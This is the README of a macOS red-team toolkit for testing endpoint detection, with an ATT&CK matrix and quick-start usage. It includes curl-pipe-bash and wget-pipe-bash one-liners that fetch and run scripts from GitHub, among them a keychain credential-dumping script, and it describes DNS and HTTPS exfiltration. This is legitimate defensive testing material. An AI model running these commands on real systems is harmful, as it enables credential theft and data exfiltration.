-grey?style=for-the-badge){kind=icon}
-grey?style=for-the-badge){kind=icon}
Key Features •
Quick Start •
Integrations
Attack-macOS provides scripts for security teams to evaluate macOS endpoint detection and response capabilities. This project executes Living Off The Orchard (LOLBins) techniques via standalone scripts with built-in encoding, encryption, formatting, logging, and exfiltration over DNS and HTTPS.
flowchart TD
A1("🚫 Limited OSS testing tools")
A2("⚡ Existing tools are tier II/III (advanced C2s)")
A3("🛡️ Commercial tools focus on hardening and MDM")
style A1 stroke:#ff6b35,stroke-width:2px,fill:transparent
style A2 stroke:#ff6b35,stroke-width:2px,fill:transparent
style A3 stroke:#ff6b35,stroke-width:2px,fill:transparent
flowchart TD
A4("📊 Limited technique and procedure coverage")
A5("❓ Known risks are not common knowledge")
A6("🔧 Hard to operationalize test pipelines")
style A4 stroke:#ff6b35,stroke-width:2px,fill:transparent
style A5 stroke:#ff6b35,stroke-width:2px,fill:transparent
style A6 stroke:#ff6b35,stroke-width:2px,fill:transparent
flowchart TD
A1("✓ Build a library of attack scripts that help security teams evaluate and improve macOS endpoint detection and response capabilities.")
style A1 stroke:#90EE90,stroke-width:2px,fill:transparent
| Feature | Description | Benefit |
|---|---|---|
| Builder Tool | YAML template, schema, and builder tool for new scripts with built-in argument parsing/validation. Parse Args | Reduces script development time and errors via automated validation. |
| Modular Design | Self-contained scripts for independent use or easy integration with security test frameworks. | Allows quick deployment without complex toolchains. |
| Standardized Help | All scripts include --help menus for standalone or handler-based execution. |
Speeds up execution by reducing documentation lookup. |
| macOS Native | TTPs primarily use native macOS command-line binaries and APIs (LOObins) via shell scripts. Some TTPs use osascript (for JXA/AppleScript), python3, or swift for specific tasks or wrappers. The attackmacos.sh handler has minimal dependencies. |
Produces realistic macOS telemetry by leveraging system utilities and scripting languages. |
| MITRE ATT&CK Mapped | Scripts and arguments map directly to the MITRE ATT&CK framework. | Aids compliance reporting and threat model alignment. |
| Logging | Syslog logging with JSON/CSV output formatting. Log Output | Automates evidence collection; speeds up post-test analysis. |
| Encoding and Encryption | Offers multiple data encoding (Base64, Hex, Perl) and encryption (AES, GPG, XOR) options. Encode Output • Encrypt Output | Simulates evasion techniques for improved test realism. |
| Exfiltration | Simulates data exfiltration via HTTP/S and DNS. Exfiltrate Data | Tests attack chains to find data loss prevention gaps. |
| CI/CD Pipeline Ready | Integrates with security tools, automation pipelines, and CI/CD workflows. | Supports continuous security testing with less manual effort. |
| Caldera Integration | Native Caldera plugin for integration with red team operations. Caldera Plugin | Streamlines Caldera deployment and execution for red teams. |
| YAML-First Configuration | Each technique defined in YAML with complete metadata, arguments, and MITRE ATT&CK mapping | Automated ability generation and consistent deployments |
| Modular Design | Self-contained scripts that work independently or combined, integrate with existing security test frameworks | Quick deployment without complex tool chains or infrastructure changes |
| Standardized Help | All scripts include --help menus for standalone execution via custom deployment frameworks |
Execute without documentation lookup |
| macOS Native | Uses native tools and interpreters without external dependencies. See LOLBins | Produces macOS telemetry attributed to threat actors |
| MITRE ATT&CK Mapped | All scripts and arguments mapped to MITRE ATT&CK framework with proper technique IDs and names | Compliance reporting and threat model alignment |
| Multiple Output Formats | JSON, CSV output formatting for analysis and integration | Evidence collection and post-test analysis |
| Encoding and Encryption | Multiple data encoding options and encryption functions including AES-256-CBC, GPG, and XOR | Test realism using evasion techniques |
| Exfiltration | Data exfiltration via HTTP/S or DNS protocols | Test complete attack chains and identify detection gaps in data loss prevention |
| CI/CD Pipeline Ready | Integrates with existing security tools, automation pipelines, and CI/CD workflows | Continuous security testing without manual intervention |
flowchart TD
A( 1: Choose your procedure script) --> A1("🐚 Shell Scripts")
A --> A2("🟡 JXA Scripts")
A --> A3("🐍 Python Scripts")
A --> A4("🦉 Swift Scripts")
A1 --> B( 2: Choose Delivery Method)
A2 --> B
A3 --> B
A4 --> B
B --> B1("🏠 Local ")
B --> B2("☁️ Remote from GGH</br>curl</br>wget</>osascript ")
B1 --> C(3: Execute</br>T1634: Dump Keys)
B2 --> C
C --> C1("📋 Format")
C --> C2("🔧 Encode")
C --> C3("🔐 Encrypt")
C --> C4("📡 Exfiltrate")
C1 --> D("📋 Log and<br>🔍Analyze Events")
C2 --> D
C3 --> D
C4 --> D
D --> D1("🎯 Identify Endpoint</br>Detection Gaps")
style A1 fill:transparent,stroke:#6140E0,stroke-width:2px
style A2 fill:transparent,stroke:#C7B300,stroke-width:2px
style A3 fill:transparent,stroke:#3BC05A, stroke-width:2px
style A4 fill:transparent,stroke:#47B7F8, stroke-width:2px
style A fill:#0D0D0D,stroke:#7A6AB7,stroke-width:2px,color:#fff
style B fill:#0D0D0D,stroke:#7A6AB7,stroke-width:2px,color:#fff
style C fill:#0D0D0D,stroke:#EB5454,stroke-width:2px,color:#fff
style D fill:#0D0D0D,stroke:#7A6AB7,stroke-width:2px,color:#fff
style D1 fill:#1a237e,stroke:#47B7F8,stroke-width:2px,color:#fff
Details
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command And Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|
 External Remote Services |
 Shared Modules |
 Socket Filters |
 Boot or Logon Initialization Scripts |
Socket Filters |
 Adversary-in-the-Middle |
 System Owner/User Discovery |
 VNC |
 Archive via Utility |
Socket Filters |
 Exfiltration Over Web Service |
 Disk Structure Wipe |
 Compromise Software Dependencies and Development Tools |
 JavaScript |
Boot or Logon Initialization Scripts |
 Path Interception by PATH Environment Variable |
 Embedded Payloads |
 Pluggable Authentication Modules |
 Internet Connection Discovery |
 Taint Shared Content |
 Screen Capture |
 Standard Encoding |
 Exfiltration Over Webhook |
 Direct Network Flood |
 Spearphishing Link |
 Malicious File |
Pluggable Authentication Modules |
 Create or Modify System Process |
Pluggable Authentication Modules |
 Keylogging |
 Permission Groups Discovery |
 SSH |
Adversary-in-the-Middle |
 Domain Generation Algorithms |
 Scheduled Transfer |
 External Defacement |
 Spearphishing Attachment |
 Cron |
Path Interception by PATH Environment Variable |
 LC_LOAD_DYLIB Addition |
 File/Path Exclusions |
 Password Guessing |
 Device Driver Discovery |
 SSH Hijacking |
Keylogging |
 DNS |
 Exfiltration Over Other Network Medium |
 OS Exhaustion Flood |
 Compromise Hardware Supply Chain |
 Scheduled Task/Job |
Create or Modify System Process |
 Sudo and Sudo Caching |
 Linux and Mac File and Directory Permissions Modification |
 OS Credential Dumping |
 Domain Account |
 Remote Services |
 Audio Capture |
 Symmetric Cryptography |
 Exfiltration Over Bluetooth |
 Application Exhaustion Flood |
 Supply Chain Compromise |
 AppleScript |
External Remote Services |
 Boot or Logon Autostart Execution |
Path Interception by PATH Environment Variable |
 Steal Web Session Cookie |
 Local Account |
 Remote Service Session Hijacking |
 Archive via Custom Method |
 Fast Flux DNS |
 Automated Exfiltration |
 Disk Wipe |
 Exploit Public-Facing Application |
 Native API |
LC_LOAD_DYLIB Addition |
Cron |
 Email Hiding Rules |
 Securityd Memory |
 System Checks |
 Software Deployment Tools |
 Email Collection |
 Application Layer Protocol |
 Exfiltration Over Symmetric Encrypted Non-C2 Protocol |
 Stored Data Manipulation |
 Content Injection |
 Command and Scripting Interpreter |
Boot or Logon Autostart Execution |
Scheduled Task/Job |
 Encrypted/Encoded File |
 Password Cracking |
 Domain Groups |
 Exploitation of Remote Services |
 Data from Removable Media |
 Remote Access Software |
 Exfiltration to Code Repository |
 Service Stop |
 Default Accounts |
 Launchctl |
Cron |
 Login Hook |
 Rootkit |
 Keychain |
 System Service Discovery |
 Internal Spearphishing |
 Local Data Staging |
Content Injection |
 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol |
 Application or System Exploitation |
 Trusted Relationship |
 XPC Services |
Scheduled Task/Job |
 Process Injection |
Sudo and Sudo Caching |
 Password Managers |
 Network Sniffing |
 Lateral Tool Transfer |
 Automated Collection |
 Traffic Signaling |
 Exfiltration Over C2 Channel |
 Runtime Data Manipulation |
 Phishing |
 User Execution |
 Browser Extensions |
 Launch Daemon |
 Match Legitimate Name or Location |
Network Sniffing |
 Network Share Discovery |
 Clipboard Data |
 Protocol Tunneling |
 Exfiltration Over Alternative Protocol |
 Reflection Amplification |
|
 Valid Accounts |
Software Deployment Tools |
Login Hook |
Default Accounts |
 Masquerade File Type |
 Steal or Forge Kerberos Tickets |
 Peripheral Device Discovery |
 Remote Data Staging |
 Mail Protocols |
 Exfiltration over USB |
 Service Exhaustion Flood |
|
 Spearphishing Voice |
 Unix Shell |
Traffic Signaling |
 Trap |
 Hide Artifacts |
 Credentials from Password Stores |
 System Information Discovery |
 Data from Local System |
 Communication Through Removable Media |
 Exfiltration to Text Storage Sites |
 Defacement |
|
 Compromise Software Supply Chain |
 Inter-Process Communication |
Launch Daemon |
 Dynamic Linker Hijacking |
System Checks |
 Unsecured Credentials |
 Wi-Fi Discovery |
 Archive via Library |
 External Proxy |
 Exfiltration to Cloud Storage |
 Financial Theft |
|
 Domain Accounts |
 Exploitation for Client Execution |
 Web Shell |
 Abuse Elevation Control Mechanism |
 Clear Linux or Mac System Logs |
 Credentials from Web Browsers |
 Application Window Discovery |
 Archive Collected Data |
 Proxy |
 Data Transfer Size Limits |
 Internal Defacement |
|
 Hardware Additions |
 Python |
Default Accounts |
 Setuid and Setgid |
 Stripped Payloads |
 DHCP Spoofing |
 Time Based Evasion |
DHCP Spoofing |
 Dynamic Resolution |
 Exfiltration Over Physical Medium |
 Data Manipulation |
|
 Drive-by Compromise |
 System Services |
Trap |
 SSH Authorized Keys |
 Gatekeeper Bypass |
 Private Keys |
 Browser Information Discovery |
 Web Portal Capture |
 Web Service |
 Exfiltration Over Unencrypted Non-C2 Protocol |
 Account Access Removal |
|
 Spearphishing via Service |
 Visual Basic |
Dynamic Linker Hijacking |
 Login Items |
 Code Signing |
 Password Spraying |
 System Network Configuration Discovery |
 Video Capture |
 DNS Calculation |
 Data Encrypted for Impact |
||
 Local Accounts |
 Malicious Link |
 Local Account |
 Emond |
 Break Process Trees |
Web Portal Capture |
 Account Discovery |
 Email Forwarding Rule |
 Multi-Stage Channels |
 Endpoint Denial of Service |
||
 At |
SSH Authorized Keys |
 Account Manipulation |
 Clear Network Connection History and Configurations |
 Steal or Forge Authentication Certificates |
 File and Directory Discovery |
 Data Staged |
 Port Knocking |
 Resource Hijacking |
|||
 Domain Account |
 Kernel Modules and Extensions |
 Clear Command History |
 Bash History |
 System Network Connections Discovery |
 GUI Input Capture |
 File Transfer Protocols |
 Transmitted Data Manipulation |
||||
 Component Firmware |
 Hijack Execution Flow |
 Deobfuscate/Decode Files or Information |
 Credentials In Files |
 Virtualization/Sandbox Evasion |
 Data from Network Shared Drive |
 One-Way Communication |
 Data Destruction |
||||
 Pre-OS Boot |
Valid Accounts |
 Impair Defenses |
 Web Cookies |
 Log Enumeration |
 Input Capture |
 Multi-hop Proxy |
 Network Denial of Service |
||||
Login Items |
 Exploitation for Privilege Escalation |
 Masquerading |
 Forge Web Credentials |
 Process Discovery |
 ARP Cache Poisoning |
 Data Obfuscation |
 Firmware Corruption |
||||
Port Knocking |
 Event Triggered Execution |
 Clear Mailbox Data |
 Multi-Factor Authentication Request Generation |
 User Activity Based Checks |
 Data from Information Repositories |
 Non-Standard Port |
 Inhibit System Recovery |
||||
 Compromise Host Software Binary |
 Unix Shell Configuration Modification |
Process Injection |
 Exploitation for Credential Access |
 Local Groups |
 Encrypted Channel |
 Disk Content Wipe |
|||||
Emond |
 Elevated Execution with Prompt |
Traffic Signaling |
GUI Input Capture |
 Password Policy Discovery |
 Bidirectional Communication |
 System Shutdown/Reboot |
|||||
Account Manipulation |
 Startup Items |
 System Binary Proxy Execution |
 Brute Force |
 System Language Discovery |
 Asymmetric Cryptography |
||||||
Kernel Modules and Extensions |
Domain Accounts |
 Timestomp |
 Credential Stuffing |
 System Location Discovery |
 Non-Application Layer Protocol |
||||||
Hijack Execution Flow |
 Launch Agent |
 Reflective Code Loading |
 Multi-Factor Authentication |
 Security Software Discovery |
 Protocol Impersonation |
||||||
Valid Accounts |
 Installer Packages |
 Ignore Process Interrupts |
Input Capture |
 Remote System Discovery |
 Domain Fronting |
||||||
Multi-Factor Authentication |
 RC Scripts |
Time Based Evasion |
ARP Cache Poisoning |
 Network Service Discovery |
 Data Encoding |
||||||
Event Triggered Execution |
 Re-opened Applications |
 Disable or Modify System Firewall |
 Multi-Factor Authentication Interception |
 Software Discovery |
 Non-Standard Encoding |
||||||
Unix Shell Configuration Modification |
 TCC Manipulation |
 Electron Applications |
 Modify Authentication Process |
 Debugger Evasion |
 Web Protocols |
||||||
Startup Items |
At |
 Code Signing Policy Modification |
 System Time Discovery |
 Ingress Tool Transfer |
|||||||
Domain Accounts |
 Dylib Hijacking |
 Binary Padding |
 Hide Infrastructure |
||||||||
Launch Agent |
Local Accounts |
Default Accounts |
 Steganography |
||||||||
 Server Software Component |
Dynamic Linker Hijacking |
 Fallback Channels |
|||||||||
Installer Packages |
 File and Directory Permissions Modification |
 Internal Proxy |
|||||||||
RC Scripts |
Abuse Elevation Control Mechanism |
 Dead Drop Resolver |
|||||||||
 Create Account |
Setuid and Setgid |
 Junk Data |
|||||||||
Re-opened Applications |
 Indicator Blocking |
||||||||||
 Power Settings |
 Right-to-Left Override |
||||||||||
At |
Component Firmware |
||||||||||
Modify Authentication Process |
 Indicator Removal |
||||||||||
Dylib Hijacking |
 Masquerade Task or Service |
||||||||||
Local Accounts |
 Plist File Modification |
||||||||||
Pre-OS Boot |
|||||||||||
 Downgrade Attack |
|||||||||||
Virtualization/Sandbox Evasion |
|||||||||||
 Execution Guardrails |
|||||||||||
Port Knocking |
|||||||||||
 Hidden Users |
|||||||||||
 Impair Command History Logging |
|||||||||||
User Activity Based Checks |
|||||||||||
 Disable or Modify Tools |
|||||||||||
Hijack Execution Flow |
|||||||||||
 Indicator Removal from Tools |
|||||||||||
Valid Accounts |
|||||||||||
 Resource Forking |
|||||||||||
 Obfuscated Files or Information |
|||||||||||
Multi-Factor Authentication |
|||||||||||
 Invalid Code Signature |
|||||||||||
 Run Virtual Instance |
|||||||||||
 Subvert Trust Controls |
|||||||||||
Elevated Execution with Prompt |
|||||||||||
 Rename System Utilities |
|||||||||||
 Spoof Security Alerting |
|||||||||||
 Steganography |
|||||||||||
Domain Accounts |
|||||||||||
 Install Root Certificate |
|||||||||||
 Compile After Delivery |
|||||||||||
 VBA Stomping |
|||||||||||
 Impersonation |
|||||||||||
 Hidden Window |
|||||||||||
 Clear Persistence |
|||||||||||
 HTML Smuggling |
|||||||||||
 Command Obfuscation |
|||||||||||
 File Deletion |
|||||||||||
 Software Packing |
|||||||||||
 Hidden File System |
|||||||||||
Debugger Evasion |
|||||||||||
 Space after Filename |
|||||||||||
TCC Manipulation |
|||||||||||
 Hidden Files and Directories |
|||||||||||
 Environmental Keying |
|||||||||||
Modify Authentication Process |
|||||||||||
Dylib Hijacking |
|||||||||||
Local Accounts |
|||||||||||
 Exploitation for Defense Evasion |
# 1. Clone the repository
git clone https://github.com/darmado/attack-macOS.git
cd attack-macOS
# 2. Local execution using the handler
./attackmacos/attackmacos.sh --method local --tactic discovery --ttp browser_history --args='-s'
# 3. Remote execution using the handler
./attackmacos/attackmacos.sh --method curl --tactic credential_access --ttp keychain --args='--verbose --encode base64'
# 4. List available TTPs for a tactic
./attackmacos/attackmacos.sh --list-local --tactic discovery
./attackmacos/attackmacos.sh --list-remote --tactic credential_access
# 5. Show banner and help
./attackmacos/attackmacos.sh --banner --helpThe ./attackmacos/attackmacos.sh handler script requires:
- A POSIX-compliant shell (e.g., bash, zsh, sh).
curlorwgetfor remote script execution (when using--method curlor--method wgetrespectively).osascriptif using the--method osascript(this is a standard component of macOS).
# 1. Build and sync Caldera plugin
python cicd/build/procedure_shell.py --sync-caldera
# 2. Copy plugin to Caldera
cp -r integrations/caldera/plugins/attackmacos /path/to/caldera/plugins/
# 3. Restart Caldera server
# Caldera operations will then include the plugin abilities.
# 4. Use with facts in Caldera
# Set fact: user.arg = "--safari --chrome --search malware"
# Execute ability: browser_historyCaldera Documentation: Caldera Plugin Guide
# 1. Clone the repository
git clone https://github.com/darmado/attack-macOS.git
cd attack-macOS
# 2. Run a technique directly
./ttp/discovery/shell/system_info.sh
# 3. Run with custom parameters
./ttp/credential_access/shell/keychains.sh --verbose --log-output --encode base64
# 4. Build a procedure from YAML (from repo root)
python3 cicd/build/procedure_shell.py attackmacos/core/config/system_info.yml# 1. Execute directly from GitHub without cloning
curl -s https://raw.githubusercontent.com/darmado/attack-macOS/main/ttp/discovery/shell/system_info.sh | bash
# 2. Download and execute with parameters
curl -s https://raw.githubusercontent.com/darmado/attack-macOS/main/ttp/credential_access/shell/keychains.sh | bash -s -- --verbose --log-output --encode base64
# 3. Execute specific technique with wget
wget -qO- https://raw.githubusercontent.com/darmado/attack-macOS/main/ttp/discovery/shell/browser_history.sh | bash- Integrations index — GitHub (
gh), Caldera, and future vendor touchpoints. - Third-party security baseline — generic minimums; links to per-integration pages (e.g. GitHub).
- Project site (GitHub Pages) — after you enable Actions-based Pages, the URL will be
https://darmado.github.io/attack-macOS/(seedocs/Design/website_docs_pipeline.mdand.github/workflows/pages.yml).
Shipped procedures: upstream sources and maintainer scripts
Coding and documentation standards
Repository: https://github.com/darmado/caldera-plugin-attack-macos
Native Caldera plugin for seamless integration with red team operations. The plugin transforms attack-macOS YAML configurations into ready-to-execute abilities using a full command approach.
This repository is intended for authorized security research, defensive validation, and red-team exercises with explicit written permission on systems you own or are contracted to assess.
The project owner and contributors are not responsible for misuse of scripts, procedures, or documentation—including unlawful access, disruption, or harm. You are solely responsible for complying with applicable laws and organizational policy. See also SECURITY.md.
attack-macOS builds on public research and community catalogs (this project is independent and not endorsed by them):
| Resource | Link |
|---|---|
| Atomic Red Team | https://github.com/redcanaryco/atomic-red-team |
| MITRE ATT&CK | https://attack.mitre.org/ — framework; data and repos: MITRE ATT&CK GitHub |
| LOOBins (Living Off the Land binaries, macOS) | https://www.loobins.io/ — reference catalog; optional tooling: PyLOOBins |
Upstream and attribution detail for shipped content is summarized in Shipped procedures: upstream sources and maintainer scripts.
Apache License 2.0. LICENSE